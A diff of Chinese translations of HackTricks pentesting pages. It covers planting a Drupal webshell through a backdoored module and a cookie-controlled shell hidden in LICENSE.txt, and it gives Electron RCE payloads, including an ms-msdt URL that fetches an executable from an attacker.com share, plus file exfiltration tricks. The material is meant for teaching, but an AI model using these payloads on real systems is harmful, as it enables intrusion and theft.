* 接下来,我们需要创建一个 **`.htaccess`** 文件,以便让自己访问该文件夹。这是必要的,因为 Drupal 拒绝直接访问 **`/modules`** 文件夹。
* 接下来,我们需要创建一个 **`.htaccess`** 文件,以便为自己提供对该文件夹的访问权限。这是必要的,因为 Drupal 拒绝直接访问 **`/modules`** 文件夹。
```html
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
```
* 上面的配置将在我们请求/modules文件夹中的文件时应用规则。将这两个文件都复制到captcha文件夹中并创建一个存档。
* 上述配置将在我们请求 /modules 中的文件时应用规则。将这两个文件复制到 captcha 文件夹并创建一个归档。
```bash
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
```
* 假设我们拥有**管理访问权限**到网站,点击侧边栏上的**`管理`**,然后点击**`扩展`**。接下来,点击**`+安装新模块`**按钮,我们将被带到安装页面,如`http://drupal-site.local/admin/modules/install`浏览到带后门的验证码存档并点击**`安装`**。
* 假设我们对网站有**管理访问权限**,点击侧边栏的**`管理`**,然后点击**`扩展`**。接下来,点击**`+ 安装新模块`**按钮,我们将被带到安装页面,如`http://drupal-site.local/admin/modules/install`。浏览到后门化的验证码归档并点击**`安装`**。
* 安装成功后,浏览到**`/modules/captcha/shell.php`**以执行命令。
## 使用配置同步给Drupal打后门 <a href="#backdooring-drupal" id="backdooring-drupal"></a>
## 使用配置同步对Drupal进行后门化 <a href="#backdooring-drupal" id="backdooring-drupal"></a>
**** [**Coiffeur0x90**](https://twitter.com/Coiffeur0x90) **分享**
**分享者** [**Coiffeur0x90**](https://twitter.com/Coiffeur0x90)
### 第一部分(激活 _Media__Media Library_
### 第1部分激活_媒体_和_媒体库_
在_扩展_菜单/admin/modules您可以激活看起来已安装的插件。默认情况下,插件 _Media__Media Library_ 似乎未被激活,因此让我们激活它们。
在_扩展_菜单/admin/modules您可以激活看似已经安装的插件。默认情况下插件_媒体_和_媒体库_似乎未被激活,因此让我们激活它们。
激活前:
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
激活后:
<figure><img src="../../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
### 第二部分(利用特性 _配置同步_ <a href="#part-2-leveraging-feature-configuration-synchronization" id="part-2-leveraging-feature-configuration-synchronization"></a>
### 第2部分利用_配置同步_功能 <a href="#part-2-leveraging-feature-configuration-synchronization" id="part-2-leveraging-feature-configuration-synchronization"></a>
我们将利用 _配置同步_ 功能来转储导出和上传导入Drupal配置条目
我们将利用_配置同步_功能来转储导出和上传导入Drupal配置条目
* /admin/config/development/configuration/single/export
* /admin/config/development/configuration/single/import
**补 system.file.yml**
**补 system.file.yml**
让我们从补第一个条目 `allow_insecure_uploads` 开始:
让我们从补第一个条目`allow_insecure_uploads`开始:
文件system.file.yml
```
@ -121,9 +122,9 @@ allow_insecure_uploads: false
...
```
<figure><img src="../../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
文件system.file.yml
```
@ -135,13 +136,13 @@ allow_insecure_uploads: true
...
```
<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
**修补 field.field.media.document.field\_media\_document.yml**
然后,从以下内容中修补第二个条目 `file_extensions`
然后,修补第二个条目 `file_extensions`
文件field.field.media.document.field\_media\_document.yml
文件: field.field.media.document.field\_media\_document.yml
```
...
@ -153,7 +154,7 @@ file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fod
```
<figure><img src="../../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
转至
文件field.field.media.document.field\_media\_document.yml
```
@ -165,13 +166,13 @@ file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp od
...
```
> 我在这篇博文中没有使用它,但请注意可以以任意方式定义条目 `file_directory`,并且容易受到路径遍历攻击的影响(因此我们可以在 Drupal 文件系统树中向上移动)。
> 我在这篇博客中没有使用它,但值得注意的是,可以以任意方式定义条目 `file_directory`并且它容易受到路径遍历攻击因此我们可以在Drupal文件系统树中向上返回)。
<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
### 第部分(利用功能 _添加文档_ <a href="#part-3-leveraging-feature-add-document" id="part-3-leveraging-feature-add-document"></a>
### 第3部分(利用功能 _添加文档_ <a href="#part-3-leveraging-feature-add-document" id="part-3-leveraging-feature-add-document"></a>
最后一步是最简单的,分为两个子步骤。第一步是上传一个以 .htaccess 格式的文件,以利用 Apache 指令并允许 PHP 引擎解释 .txt 文件。第二步是上传一个包含我们有效负载的 .txt 文件。
最后一步是最简单的,分为两个子步骤。第一个是上传一个.htaccess格式的文件以利用Apache指令并允许PHP引擎解释.txt文件。第二个是上传一个包含我们有效载荷的.txt文件。
文件:.htaccess
```
@ -193,15 +194,15 @@ php_flag engine on
```
为什么这个技巧很酷?
因为一旦 Webshell我们将其称为 LICENSE.txt被放置到 Web 服务器上,我们可以通过 `$_COOKIE` 传输我们的命令,在 Web 服务器日志中,这将显示为对文本文件的合法 GET 请求。
因为一旦 Webshell我们称为 LICENSE.txt被放置到 Web 服务器上,我们可以通过 `$_COOKIE` 传输我们的命令,并且在 Web 服务器日志中,这将显示为对文本文件的合法 GET 请求。
为什么命名我们的 Webshell 为 LICENSE.txt
为什么将我们的 Webshell 命名为 LICENSE.txt
简单地说,因为如果我们拿以下文件为例 [core/LICENSE.txt](https://github.com/drupal/drupal/blob/11.x/core/LICENSE.txt)(已经存在于 Drupal 核心中),我们有一个包含 339 行和 17.6 KB 大小的文件,非常适合在中间添加一小段 PHP 代码(因为文件足够大)。
简单来说,如果我们以以下文件为例 [core/LICENSE.txt](https://github.com/drupal/drupal/blob/11.x/core/LICENSE.txt)该文件已经存在于 Drupal 核心中我们有一个339行和17.6 KB大小的文件非常适合在中间添加一小段 PHP 代码(因为文件足够大)。
<figure><img src="../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
文件:已打补丁的 LICENSE.txt
文件:已修补的 LICENSE.txt
```txt
...
@ -232,7 +233,7 @@ programs whose distribution conditions are different, write to the author
```
#### **第3.1部分(上传文件 .htaccess**
首先,我们利用 _Add Document_ (/media/add/document) 功能上传包含 Apache 指令的文件(.htaccess
首先,我们利用 _Add Document_ (/media/add/document) 功能上传包含Apache指令的文件.htaccess
<figure><img src="../../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
@ -242,7 +243,7 @@ programs whose distribution conditions are different, write to the author
**第3.2部分(上传文件 LICENSE.txt**
然后,我们再次利用 _Add Document_ (/media/add/document) 功能上传一个隐藏在许可文件中的 Webshell。
然后,我们再次利用 _Add Document_ (/media/add/document) 功能上传隐藏在许可文件中的Webshell。
<figure><img src="../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
@ -250,20 +251,35 @@ programs whose distribution conditions are different, write to the author
<figure><img src="../../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure>
### 第4部分 Webshell 交互) <a href="#part-4-interaction-with-the-webshell" id="part-4-interaction-with-the-webshell"></a>
### 第4部分与Webshell交互 <a href="#part-4-interaction-with-the-webshell" id="part-4-interaction-with-the-webshell"></a>
最后一部分涉及与 Webshell 进行交互。
最后一部分是与Webshell进行交互。
下截图所示,如果我们的 Webshell 预期的 cookie 未定义,通过 Web 浏览器查询文件时会得到以下结果。
以下截图所示如果我们的Webshell所期望的cookie未定义则在通过Web浏览器查询文件时会得到后续结果。
<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
当攻击者设置了 cookie 后,他可以与 Webshell 进行交互并执行任何想要的命令。
当攻击者设置cookie时他可以与Webshell交互并执行任何他想要的命令。
<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
正如您在日志中看到的,似乎只请求了一个 txt 文件。
正如您在日志中看到的似乎只请求了一个txt文件。
<figure><img src="../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
感谢您抽出时间阅读本文,希望能帮助您获取一些 shell。
感谢您花时间阅读本文希望它能帮助您获取一些shell。
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持HackTricks</summary>
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR分享黑客技巧。
</details>
{% endhint %}

150
network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
View file

@ -1,26 +1,27 @@
# Electron桌面应用程序
# Electron Desktop Apps
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,14 +31,14 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## 介绍
Electron结合了本地后端(使用**NodeJS**)和前端(**Chromium**),尽管它缺少一些现代浏览器的安全机制。
Electron 结合了本地后端(使用 **NodeJS**)和前端(**Chromium**),尽管它缺乏现代浏览器的一些安全机制。
通常,您可能会在`.asar`应用程序中找到Electron应用程序代码为了获取代码您需要提取它
通常,您可能会在 `.asar` 应用程序中找到 Electron 应用代码,提取代码需要您进行解压
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
在 Electron 应用的源代码中,在 `packet.json` 文件中,你可以找到指定了 `main.js` 文件的安全配置。
在 Electron 应用的源代码中,在 `packet.json` 文件内,可以找到指定的 `main.js` 文件,其中设置了安全配置。
```json
{
"name": "standard-notes",
@ -46,11 +47,11 @@ npx asar extract-file app.asar main.js #Extract just a file
Electron 有 2 种进程类型:
* 主进程(完全访问 NodeJS
* 渲染进程(出于安全原因,应限制 NodeJS 访问权限
* 渲染进程(出于安全原因,NodeJS 访问应受到限制
![](<../../../.gitbook/assets/image (182).png>)
一个 **渲染进程** 将是加载文件的浏览器窗口:
一个 **渲染进程** 将是一个加载文件的浏览器窗口:
```javascript
const {BrowserWindow} = require('electron');
let win = new BrowserWindow();
@ -58,18 +59,18 @@ let win = new BrowserWindow();
//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
**渲染进程**的设置可以在main.js文件中的**主进程**中进行**配置**。如果**设置正确配置**,一些配置将**防止Electron应用程序受到RCE**或其他漏洞的影响
设置 **renderer process** 可以在 **main process** 中的 main.js 文件中 **配置**。一些配置将 **防止 Electron 应用程序获得 RCE** 或其他漏洞,如果 **设置正确配置**
尽管可以配置Electron应用程序以防止其访问设备
Electron 应用程序 **可以通过 Node API 访问设备**,尽管可以配置以防止它
- **`nodeIntegration`** - 默认为`off`。如果打开允许从渲染进程访问Node功能
- **`contextIsolation`** - 默认为`on`。如果关闭,主进程和渲染进程不会被隔离。
- **`preload`** - 默认为空。
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - 默认为关闭。它将限制NodeJS可以执行的操作。
- Workers中的Node集成
- **`nodeIntegrationInSubframes`** - 默认为`off`。
- 如果启用了**`nodeIntegration`**这将允许在Electron应用程序中的**iframe**中加载的网页中使用**Node.js API**
- 如果**`nodeIntegration`**被**禁用**则preload将在iframe中加载
* **`nodeIntegration`** - 默认情况下为 `off`。如果开启,允许从 renderer process 访问 Node 特性
* **`contextIsolation`** - 默认情况下为 `on`。如果关闭,主进程和渲染进程不会隔离。
* **`preload`** - 默认情况下为空。
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - 默认情况下为 off。它将限制 NodeJS 可以执行的操作。
* 工作线程中的 Node 集成
* **`nodeIntegrationInSubframes`** - 默认情况下 `off`
* 如果 **`nodeIntegration`** 被 **启用**,这将允许在 Electron 应用程序中 **加载在 iframe 中的网页** 使用 **Node.js API**
* 如果 **`nodeIntegration`** 被 **禁用**,则预加载将在 iframe 中加载。
配置示例:
```javascript
@ -97,7 +98,7 @@ spellcheck: true
}
};
```
一些**RCE payloads**来自[这里](https://7as.es/electron/nodeIntegration\_rce.txt)
一些 **RCE payloads** 来自 [这里](https://7as.es/electron/nodeIntegration\_rce.txt):
```html
Example Payloads (Windows):
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
@ -111,13 +112,13 @@ Example Payloads (Linux & MacOS):
```
### 捕获流量
修改`start-main`配置并添加使用代理,例如:
修改 start-main 配置并添加使用代理,例如:
```javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
```
## Electron 本地代码注入
如果你可以在本地执行 Electron 应用程序,那么可能可以让它执行任意的 JavaScript 代码。查看方法
如果您可以本地执行一个 Electron 应用程序,那么您可能可以使其执行任意的 JavaScript 代码。请查看如何操作
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
@ -125,7 +126,7 @@ Example Payloads (Linux & MacOS):
## RCE: XSS + nodeIntegration
如果 **nodeIntegration** 设置为 **on**一个网页的 JavaScript 可以轻松使用 Node.js 功能,只需调用 `require()`。例如,在 Windows 上执行计算器应用程序的方法是:
如果 **nodeIntegration** 设置为 **on**,网页的 JavaScript 可以轻松使用 Node.js 功能,只需调用 `require()`。例如,在 Windows 上执行 calc 应用程序的方法是:
```html
<script>
require('child_process').exec('calc');
@ -137,7 +138,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app');
## RCE: preload
这个设置中指定的脚本是在渲染器中的其他脚本之前加载的,因此它具有对 Node API 的无限访问权限
此设置中指示的脚本是在渲染器中**加载其他脚本之前**,因此它具有**对 Node API 的无限访问权限**
```javascript
new BrowserWindow{
webPreferences: {
@ -146,7 +147,7 @@ preload: _path2.default.join(__dirname, 'perload.js'),
}
});
```
因此,脚本可以将节点功能导出到页面:
因此,脚本可以将 node-features 导出到页面:
{% code title="preload.js" %}
```javascript
@ -169,21 +170,21 @@ runCalc();
{% endcode %}
{% hint style="info" %}
**如果`contextIsolation`被启用,这将无法工作**
**如果 `contextIsolation` 开启,这将不起作用**
{% endhint %}
## RCE: XSS + contextIsolation
_**contextIsolation**_引入了**网页脚本和JavaScript Electron内部代码之间的分离上下文**使得每个代码的JavaScript执行不会相互影响。这是一个必要的功能以消除RCE的可能性。
_**contextIsolation**_ 引入了 **网页脚本与 JavaScript Electron 内部代码之间的分离上下文**,使得每段代码的 JavaScript 执行不会相互影响。这是消除 RCE 可能性的必要特性。
如果上下文没有被隔离,攻击者可以:
1. 在渲染器中执行**任意JavaScript**XSS或导航到外部站
2. **覆盖**在preload或Electron内部代码中使用的内置方法为自己的函数
3. **触发**覆盖的函数的使用
1. 在渲染器中执行 **任意 JavaScript**XSS 或导航到外部站)
2. **覆盖内置方法**,该方法用于预加载或 Electron 内部代码,替换为自己的函数
3. **触发** 使用 **被覆盖的函数**
4. RCE
内置方法可以被覆盖的地方有两个:在preload代码中或在Electron内部代码中:
内置方法可以被覆盖的地方有两个:在预加载代码中或在 Electron 内部代码中:
{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
@ -199,32 +200,32 @@ _**contextIsolation**_引入了**网页脚本和JavaScript Electron内部代码
### 绕过点击事件
如果在单击链接时应用了限制,您可能可以通过**中键单击**而不是常规左键单击来绕过这些限制
如果在点击链接时有限制,您可能能够通过 **中间点击** 而不是常规的左键点击来绕过这些限制。
```javascript
window.addEventListener('click', (e) => {
```
## 通过 shell.openExternal 实现远程代码执行RCE
## RCE via shell.openExternal
有关这些示例的更多信息,请查看[https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8)和[https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
有关此示例的更多信息,请查看 [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
在部署 Electron 桌面应用程序时,确保 `nodeIntegration``contextIsolation` 的正确设置至关重要。已经确定,通过设置这些参数,可以有效防止针对预加载脚本或 Electron 主进程的**客户端远程代码执行RCE**
在部署 Electron 桌面应用程序时,确保 `nodeIntegration``contextIsolation` 的正确设置至关重要。已确定,**针对预加载脚本或 Electron 的主进程本机代码的客户端远程代码执行 (RCE)** 在这些设置到位时得到了有效防止
用户与链接交互或打开新窗口时,会触发特定的事件侦听器,这对应用程序的安全性和功能至关重要:
当用户与链接互动或打开新窗口时,会触发特定的事件监听器,这对应用程序的安全性和功能至关重要:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
这些监听器被**桌面应用程序**覆盖,以实现自己的**业务逻辑**。 应用程序会评估导航链接应在内部打开还是在外部Web浏览器中打开。 这个决定通常通过一个名为 `openInternally` 的函数来做出。 如果这个函数返回 `false`,则表示链接应在外部打开,利用 `shell.openExternal` 函数。
这些监听器被**桌面应用程序重写**以实现其自己的**业务逻辑**。该应用程序评估导航链接是否应该在内部打开或在外部网页浏览器中打开。这个决定通常通过一个函数`openInternally`来做。如果这个函数返回`false`,则表示链接应该在外部打开,利用`shell.openExternal`函数。
**以下是简化的伪代码:**
**以下是简化的伪代码**
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (261).png>)
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (963).png>)
Electron JS 安全最佳实践建议不要使用 `openExternal` 函数接受不受信任的内容,因为这可能通过各种协议导致远程代码执行(RCE 操作系统支持可能触发 RCE 的不同协议 有关此主题的详细示例和进一步解释,可以参考[资源](https://positive.security/blog/url-open-rce#windows-10-19042),其中包括能够利用此漏洞的 Windows 协议示例。
Electron JS安全最佳实践建议不要使用`openExternal`函数接受不受信任的内容因为这可能通过各种协议导致RCE。操作系统支持不同的协议,这些协议可能触发RCE。有关此主题的详细示例和进一步解释可以参考[这个资源](https://positive.security/blog/url-open-rce#windows-10-19042)其中包括能够利用此漏洞的Windows协议示例。
**Windows 协议利用示例包括:**
**Windows协议利用的示例包括:**
```html
<script>
window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")
@ -240,11 +241,11 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
```
## 读取内部文件XSS + contextIsolation
**禁用 `contextIsolation` 可以启`<webview>` 标签**,类似于 `<iframe>`,用于读取和外泄本地文件。提供的示例演示了如何利用此漏洞读取内部文件的内容:
**禁用 `contextIsolation` 使得可以使`<webview>` 标签**,类似于 `<iframe>`,用于读取和外泄本地文件。提供的示例演示了如何利用此漏洞读取内部文件的内容:
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf\_F2ttJg (1).png>)
此外,还分享了另一种**读取内部文件**的方法,突出了 Electron 桌面应用程序中的关键本地文件读取漏洞。这涉及注入脚本以利用应用程序并外泄数据:
此外,还分享了另一种**读取内部文件**的方法,突出了 Electron 桌面应用中的一个关键本地文件读取漏洞。这涉及注入脚本以利用应用并外泄数据:
```html
<br><BR><BR><BR>
<h1>pwn<br>
@ -255,21 +256,21 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
```
## **RCE: XSS + 旧版 Chromium**
如果应用程序使用的 **Chromium** 版本较旧,并且存在已知的 **漏洞**,可能可以通过 **XSS** 利用它并获取 **RCE**。\
您可以在这个 **writeup** 中看到一个示例:[https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
如果应用程序使用的 **chromium** 是 **旧版** 并且存在 **已知的漏洞**,那么可能通过 **XSS 利用它并获得 RCE**。\
您可以在这个 **writeup** 中看到一个例子: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **通过内部 URL 正则表达式绕过进行 XSS 钓鱼**
## **通过内部 URL 正则绕过进行 XSS 钓鱼**
假设您发现了一个 **XSS**,但是 **无法触发 RCE 或窃取内部文件**,您可以尝试使用它来通过 **钓鱼** 窃取凭据
假设您发现了一个 XSS但您 **无法触发 RCE 或窃取内部文件**,您可以尝试利用它来 **通过钓鱼窃取凭据**
首先,您需要了解当尝试打开新 URL 时会发生什么,检查前端的 JS 代码:
首先,您需要了解当您尝试打开一个新 URL 时,前端的 JS 代码会发生什么:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
调用**`openInternally`**将决定是否将**链接**在**桌面窗口**中打开,因为它是属于平台的链接,**或者**是否将在**浏览器中作为第三方资源**打开。
调用 **`openInternally`** 将决定 **链接** 是否在 **桌面窗口****打开**,因为它是属于平台的链接,**或者** 是否在 **浏览器中作为第三方资源** 打开。
在函数中使用的**正则表达式**容易被绕过(例如**未转义子域的点**),攻击者可以利用 XSS **打开一个新窗口**,该窗口位于攻击者的基础设施中,**要求用户提供凭据**
如果该函数使用的 **正则表达式** **易受绕过攻击**(例如 **未转义子域的点**),攻击者可能会利用 XSS **打开一个新窗口**,该窗口位于攻击者的基础设施中,**向用户请求凭据**
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
@ -277,16 +278,16 @@ window.open("<http://subdomainagoogleq.com/index.html>")
```
## **工具**
* [**Electronegativity**](https://github.com/doyensec/electronegativity) 是一个用于识别 Electron 应用程序中的配置错误和安全反模式的工具。
* [**Electronegativity**](https://github.com/doyensec/electronegativity) 是一个用于识别基于 Electron 应用程序中的错误配置和安全反模式的工具。
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) 是一个开源的 VS Code 插件,用于 Electron 应用程序,使用 Electronegativity。
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) 用于检查第三方库是否存在漏洞。
* [**Electro.ng**](https://electro.ng/):需要购买
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) 用于检查易受攻击的第三方库
* [**Electro.ng**](https://electro.ng/): 你需要购买它
## 实验室
在 [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) 中,您可以找到一个用于利用易受攻击的 Electron 应用程序的实验室。
在 [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) 中,你可以找到一个利用易受攻击的 Electron 应用程序的实验室。
一些命令可以帮助您完成实验室任务
一些将帮助你进行实验室的命令
```bash
# Download apps from these URls
# Vuln to nodeIntegration
@ -309,38 +310,39 @@ cd vulnerable1
npm install
npm start
```
## **参考资料**
## **参考文献**
* [https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028](https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028)
* [https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)
* [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8)
* [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
* [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
* 有关 Electron 安全性的更多研究和撰写内容,请参考 [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* 更多关于Electron安全的研究和文章在 [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 提供动力的搜索引擎,提供免费功能,用于检查公司或其客户是否已受到 **窃取恶意软件****侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**驱动的搜索引擎,提供**免费**功能以检查公司或其客户是否被**窃取恶意软件**所**侵害**
WhiteIntel 的主要目标是打击由于窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
